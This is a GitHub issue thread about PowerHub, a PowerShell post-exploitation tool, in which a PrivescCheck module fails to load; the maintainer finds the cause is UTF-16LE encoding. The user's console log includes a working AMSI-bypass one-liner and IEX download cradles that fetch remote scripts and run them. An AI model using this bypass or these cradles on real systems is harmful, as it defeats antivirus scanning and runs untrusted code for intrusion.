### ISSUE TITLE
Support other encodings than UTF-8 in PS1 modules

### ISSUE THREAD

**Issue by exploide** [AdrianVollmer/PowerHub#48]
I wanted to load [PrivescCheck](https://github.com/itm4n/PrivescCheck) from PowerHub but it failed. Here what happened:

First, I tried to load PowerHub (current version on master) but it was detected by AMSI. So I needed to apply a manual bypass first:

```
PS C:\Users\User>  $K=New-Object Net.WebClient;IEX $K.DownloadString('http://example.org:8080/0?t=http&a=reflection');
IEX : In Zeile:1 Zeichen:1
+
Das Skript enthält schädliche Daten und wurde von Ihrer Antivirensoftware blockiert.
In Zeile:1 Zeichen:30
+ ... t.WebClient;IEX $K.DownloadString('http://example.org:8080/0?t=http&a= ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

PS C:\Users\User> $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
PS C:\Users\User>  $K=New-Object Net.WebClient;IEX $K.DownloadString('http://example.org:8080/0?t=http&a=reflection');
True
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
                            written by Adrian Vollmer, 2018-2021
Run 'Help-PowerHub' for help
```

Then I tried loading PrivescCheck but it failed with syntax errors. Note that PowerHub is able to load another module like PrivescCheckOld flawlessly:

```
PS C:\Users\User> lshm

N Type Name                          Loaded
- ---- ----                          ------
0 ps1  ps1/PrivescCheck.ps1          False
1 ps1  ps1/PrivescCheckOld.ps1       False
2 ps1  ps1/BloodHound/AzureHound.ps1 False
3 ps1  ps1/BloodHound/SharpHound.ps1 False


PS C:\Users\User> lhm 0
Import-HubModule : Ausnahme beim Aufrufen von "Create" mit 1 Argument(en):  "In Zeile:80 Zeichen:58
+     [CmdletBinding()] param(
+                                                          ~
Schließende ")" fehlt in einem Ausdruck.
In Zeile:76 Zeichen:100
+ ... -FromBase64CompressedScriptBlock {
+                                                                        ~
Die schließende "}" fehlt im Anweisungsblock oder der Typdefinition.
In Zeile:86 Zeichen:10
+     )
+          ~
Unerwartetes Token ")" in Ausdruck oder Anweisung.
In Zeile:98 Zeichen:108
+ ... Object System.IO.MemoryStream(, $Sc ...
+                                                                 ~
Argument in der Parameterliste fehlt.
In Zeile:114 Zeichen:2
+ }
+  ~
Unerwartetes Token "}" in Ausdruck oder Anweisung."
In Zeile:240 Zeichen:13
+             Import-HubModule $_
+             ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Import-HubModule], MethodInvocationException
    + FullyQualifiedErrorId : ParseException,Import-HubModule

PS C:\Users\User> lhm 1

Name                    Type N Loaded
----                    ---- - ------
ps1/PrivescCheckOld.ps1 ps1  1   True
```

But I don' think it's a problem with PrivescCheck itself, because I can load it directly with

```
PS C:\Users\User> IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1")
PS C:\Users\User>
```

So I assume a PowerHub bug?

**Comment by AdrianVollmer** [comment]
It's an encoding issue. The authors of PrivescCheck chose to encode `PrivescCheck.ps1` in UTF-16LE (but not `PrivescCheckOld.ps1`). Windows handles it automagically, PowerSploit expects UTF-8.

`dos2unix PrivescCheck.ps1` fixes it. I suppose we can add an encoding detection, even though the encoding cannot be determined in general.

**Comment by exploide** [comment]
Good to know. Yes, I think trying to detect the encoding would be helpful since the `dos2unix` conversion would be lost after each and every `git pull`.

**Comment by AdrianVollmer** [comment]
Should be fixed in 1.11
